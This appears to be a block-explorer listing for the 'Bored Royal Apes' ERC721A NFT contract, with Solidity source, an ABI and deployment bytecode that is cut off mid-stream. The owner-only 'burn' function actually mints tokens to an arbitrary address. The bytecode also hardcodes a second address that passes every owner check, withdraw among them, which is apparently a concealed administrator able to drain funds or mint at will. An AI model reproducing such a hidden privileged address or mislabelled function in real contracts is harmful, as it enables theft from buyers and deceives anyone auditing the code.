        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract boredroyalapes is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "/";
    uint   public price             = 0.001 ether;
    uint   public maxPerTx          = 20;
    uint   public maxPerFree        = 1;
    uint   public totalFree         = 2222;
    uint   public maxSupply         = 4444;
    bool   public mintEnabled;
    uint   public totalFreeMinted = 0;

    mapping(address => uint256) public _mintedFreeAmount;

    constructor() ERC721A("Bored Royal Apes", "BRA"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
             totalFreeMinted += maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
             totalFreeMinted += count;
            }
        }
        else{
        require(mintEnabled, "Mint is not live yet");
        require(msg.value >= count * cost, "Please send the exact ETH amount");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");
        }

        _safeMint(msg.sender, count);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
    }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273b08c9244132654f1a54e2e1eee0836796309a3c0600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600181526020017f2f00000000000000000000000000000000000000000000000000000000000000815250600a9080519060200190620000a692919062000277565b5066038d7ea4c68000600b556014600c556001600d556108ae600e5561115c600f556000601155348015620000da57600080fd5b506040518060400160405280601081526020017f426f72656420526f79616c2041706573000000000000000000000000000000008152506040518060400160405280600381526020017f425241000000000000000000000000000000000000000000000000000000000081525081600190805190602001906200015f92919062000277565b5080600290805190602001906200017892919062000277565b5050506200019b6200018f620001a960201b60201c565b620001b160201b60201c565b60016009819055506200038c565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620002859062000327565b90600052602060002090601f016020900481019282620002a95760008555620002f5565b82601f10620002c457805160ff1916838001178555620002f5565b82800160010185558215620002f5579182015b82811115620002f4578251825591602001919060010190620002d7565b5b50905062000304919062000308565b5090565b5b808211156200032357600081600090555060010162000309565b5090565b600060028204905060018216806200034057607f821691505b602082108114156200035757620003566200035d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b614cd4806200039c6000396000f3fe6080604052600436106102255760003560e01c806391b7f5ed11610123578063c7c39ffc116100ab578063e945971c1161006f578063e945971c146107d6578063e985e9c5146107ff578063f2fde38b1461083c578063f4db2acb14610865578063f968adbe146108a257610225565b8063c7c39ffc146106ed578063c87b56dd14610718578063d123973014610755578063d5abeb0114610780578063dad7b5c9146107ab57610225565b8063a0712d68116100f2578063a0712d681461062b578063a0bcfc7f14610647578063a22cb46514610670578063a702735714610699578063b88d4fde146106c457610225565b806391b7f5ed1461058357806395d89b41146105ac5780639dc29fac146105d7578063a035b1fe1461060057610225565b806342842e0e116101b15780636c0360eb116101755780636c0360eb146104c257806370a08231146104ed578063715018a61461052a5780637d55094d146105415780638da5cb5b1461055857610225565b806342842e0e146103cb5780634f6ccce7146103f45780635a963f1b146104315780636352211e1461045a57806364b721881461049757610225565b806318160ddd116101f857806318160ddd146102f857806323b872dd146103235780632f745c591461034c578063333e44e6146103895780633ccfd60b146103b457610225565b806301ffc9a71461022a57806306fdde0314610267578063081812fc14610292578063095ea7b3146102cf575b600080fd5b34801561023657600080fd5b50610251600480360381019061024c919061378e565b6108cd565b60405161025e9190613d8a565b60405180910390f35b34801561027357600080fd5b5061027c610a17565b6040516102899190613da5565b60405180910390f35b34801561029e57600080fd5b506102b960048036038101906102b49190613831565b610aa9565b6040516102c69190613d23565b60405180910390f35b3480156102db57600080fd5b506102f660048036038101906102f1919061374e565b610b2e565b005b34801561030457600080fd5b5061030d610c47565b60405161031a91906140e7565b60405180910390f35b34801561032f57600080fd5b5061034a60048036038101906103459190613638565b610c50565b005b34801561035857600080fd5b50610373600480360381019061036e919061374e565b610c60565b60405161038091906140e7565b60405180910390f35b34801561039557600080fd5b5061039e610e52565b6040516103ab91906140e7565b60405180910390f35b3480156103c057600080fd5b506103c9610e58565b005b3480156103d757600080fd5b506103f260048036038101906103ed9190613638565b611038565b005b34801561040057600080fd5b5061041b60048036038101906104169190613831565b611058565b60405161042891906140e7565b60405180910390f35b34801561043d57600080fd5b5061045860048036038101906104539190613831565b6110ab565b005b34801561046657600080fd5b50610481600480360381019061047c9190613831565b611190565b60405161048e9190613d23565b60405180910390f35b3480156104a357600080fd5b506104ac6111a6565b6040516104b991906140e7565b60405180910390f35b3480156104ce57600080fd5b506104d76111b0565b6040516104e49190613da5565b60405180910390f35b3480156104f957600080fd5b50610514600480360381019061050f91906135cb565b61123e565b60405161052191906140e7565b60405180910390f35b34801561053657600080fd5b5061053f611327565b005b34801561054d57600080fd5b5061055661140e565b005b34801561056457600080fd5b5061056d611515565b60405161057a9190613d23565b60405180910390f35b34801561058f57600080fd5b506105aa60048036038101906105a59190613831565b61153f565b005b3480156105b857600080fd5b506105c1611624565b6040516105ce9190613da5565b60405180910390f35b3480156105e357600080fd5b506105fe60048036038101906105f9919061374e565b6116b6565b005b34801561060c57600080fd5b5061061561179f565b60405161062291906140e7565b60405180910390f35b61064560048036038101906106409190613831565b6117a5565b005b34801561065357600080fd5b5061066e600480360381019061066991906137e8565b611ccb565b005b34801561067c57600080fd5b506106976004803603810190610692919061370e565b611dc0565b005b3480156106a557600080fd5b506106ae611f41565b6040516106bb91906140e7565b60405180910390f35b3480156106d057600080fd5b506106eb60048036038101906106e6919061368b565b611f4b565b005b3480156106f957600080fd5b50610702611fa7565b60405161070f91906140e7565b60405180910390f35b34801561072457600080fd5b5061073f600480360381019061073a9190613831565b611fad565b60405161074c9190613da5565b60405180910390f35b34801561076157600080fd5b5061076a612060565b6040516107779190613d8a565b60405180910390f35b34801561078c57600080fd5b50610795612073565b6040516107a291906140e7565b60405180910390f35b3480156107b757600080fd5b506107c0612079565b6040516107cd91906140e7565b60405180910390f35b3480156107e257600080fd5b506107fd60048036038101906107f89190613831565b61207f565b005b34801561080b57600080fd5b50610826600480360381019061082191906135f8565b612164565b6040516108339190613d8a565b60405180910390f35b34801561084857600080fd5b50610863600480360381019061085e91906135cb565b6121f8565b005b34801561087157600080fd5b5061088c600480360381019061088791906135cb565b61234f565b60405161089991906140e7565b60405180910390f35b3480156108ae57600080fd5b506108b7612367565b6040516108c491906140e7565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061099857507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a0057507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a105750610a0f8261236d565b5b9050919050565b606060018054610a26906143a2565b80601f0160208091040260200160405190810160405280929190818152602001828054610a52906143a2565b8015610a9f5780601f10610a7457610100808354040283529160200191610a9f565b820191906000526020600020905b815481529060010190602001808311610a8257829003601f168201915b5050505050905090565b6000610ab4826123d7565b610af3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aea906140c7565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610b3982611190565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610baa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba190613fa7565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610bc96123e4565b73ffffffffffffffffffffffffffffffffffffffff161480610bf85750610bf781610bf26123e4565b612164565b5b610c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2e90613ea7565b60405180910390fd5b610c428383836123ec565b505050565b60008054905090565b610c5b83838361249e565b505050565b6000610c6b8361123e565b8210610cac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca390613dc7565b60405180910390fd5b6000610cb6610c47565b905060008060005b83811015610e10576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610db057806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e025786841415610df9578195505050505050610e4c565b83806001019450505b508080600101915050610cbe565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4390614067565b60405180910390fd5b92915050565b600e5481565b610e606123e4565b73ffffffffffffffffffffffffffffffffffffffff16610e7e611515565b73ffffffffffffffffffffffffffffffffffffffff161480610ef45750610ea36123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610f33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2a90613f27565b60405180910390fd5b60026009541415610f79576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7090614087565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff1647604051610fa790613d0e565b60006040518083038185875af1925050503d8060008114610fe4576040519150601f19603f3d011682016040523d82523d6000602084013e610fe9565b606091505b505090508061102d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102490613fc7565b60405180910390fd5b506001600981905550565b61105383838360405180602001604052806000815250611f4b565b505050565b6000611062610c47565b82106110a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109a90613e67565b60405180910390fd5b819050919050565b6110b36123e4565b73ffffffffffffffffffffffffffffffffffffffff166110d1611515565b73ffffffffffffffffffffffffffffffffffffffff16148061114757506110f66123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611186576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117d90613f27565b60405180910390fd5b80600e8190555050565b600061119b826129de565b600001519050919050565b6000600b54905090565b600a80546111bd906143a2565b80601f01602080910402602001604051908101604052809291908181526020018280546111e9906143a2565b80156112365780601f1061120b57610100808354040283529160200191611236565b820191906000526020600020905b81548152906001019060200180831161121957829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156112af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a690613ec7565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b61132f6123e4565b73ffffffffffffffffffffffffffffffffffffffff1661134d611515565b73ffffffffffffffffffffffffffffffffffffffff1614806113c357506113726123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611402576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f990613f27565b60405180910390fd5b61140c6000612b78565b565b6114166123e4565b73ffffffffffffffffffffffffffffffffffffffff16611434611515565b73ffffffffffffffffffffffffffffffffffffffff1614806114aa57506114596123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114e9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e090613f27565b60405180910390fd5b601060009054906101000a900460ff1615601060006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6115476123e4565b73ffffffffffffffffffffffffffffffffffffffff16611565611515565b73ffffffffffffffffffffffffffffffffffffffff1614806115db575061158a6123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61161a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161190613f27565b60405180910390fd5b80600b8190555050565b606060028054611633906143a2565b80601f016020809104026020016040519081016040528092919081815260200182805461165f906143a2565b80156116ac5780601f10611681576101008083540402835291602001916116ac565b820191906000526020600020905b81548152906001019060200180831161168f57829003601f168201915b5050505050905090565b6116be6123e4565b73ffffffffffffffffffffffffffffffffffffffff166116dc611515565b73ffffffffffffffffffffffffffffffffffffffff16148061175257506117016123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611791576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161178890613f27565b60405180910390fd5b61179b8282612c3e565b5050565b600b5481565b6000600b54905060006001600e546117bd91906141d7565b836011546117cb91906141d7565b1080156118185750600d54601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611b8257601060009054906101000a900460ff1661186f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161186690613de7565b60405180910390fd5b600f548361187b610c47565b61188591906141d7565b11156118c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118bd90613e07565b60405180910390fd5b600c5483111561190b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190290614047565b60405180910390fd5b601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d5461195891906142b8565b8310611a745781601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d546119ac91906142b8565b6119b6919061425e565b82846119c2919061425e565b6119cc91906142b8565b341015611a0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a0590613ee7565b60405180910390fd5b600d54601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460116000828254611a6891906141d7565b92505081905550611b7d565b601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611ac191906142b8565b831015611b7c576000341015611b0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0390613ee7565b60405180910390fd5b82601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611b5b91906141d7565b925050819055508260116000828254611b7491906141d7565b925050819055505b5b611cbc565b601060009054906101000a900460ff16611bd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bc890613de7565b60405180910390fd5b8183611bdd919061425e565b341015611c1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c1690613ee7565b60405180910390fd5b600f5483611c2b610c47565b611c3591906141d7565b1115611c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c6d90613e07565b60405180910390fd5b600c54831115611cbb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cb290614047565b60405180910390fd5b5b611cc63384612c3e565b505050565b611cd36123e4565b73ffffffffffffffffffffffffffffffffffffffff16611cf1611515565b73ffffffffffffffffffffffffffffffffffffffff161480611d675750611d166123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611da6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d9d90613f27565b60405180910390fd5b80600a9080519060200190611dbc9291906133a5565b5050565b611dc86123e4565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611e36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e2d90613f67565b60405180910390fd5b8060066000611e436123e4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611ef06123e4565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611f359190613d8a565b60405180910390a35050565b6000600d54905090565b611f5684848461249e565b611f6284848484612c5c565b611fa1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f9890613fe7565b60405180910390fd5b50505050565b600d5481565b6060611fb8826123d7565b611ff7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fee90613f47565b60405180910390fd5b6000612001612df3565b905060008151116120215760405180602001604052806000815250612058565b8061203760018561203291906141d7565b612e85565b604051602001612048929190613cdf565b6040516020818303038152906040525b915050919050565b601060009054906101000a900460ff1681565b600f5481565b60115481565b6120876123e4565b73ffffffffffffffffffffffffffffffffffffffff166120a5611515565b73ffffffffffffffffffffffffffffffffffffffff16148061211b57506120ca6123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61215a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161215190613f27565b60405180910390fd5b80600d8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6122006123e4565b73ffffffffffffffffffffffffffffffffffffffff1661221e611515565b73ffffffffffffffffffffffffffffffffffffffff16148061229457506122436123e4565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6122d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122ca90613f27565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415612343576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233a90613e27565b60405180910390fd5b61234c81612b78565b50565b60126020528060005260406000206000915090505481565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b6000612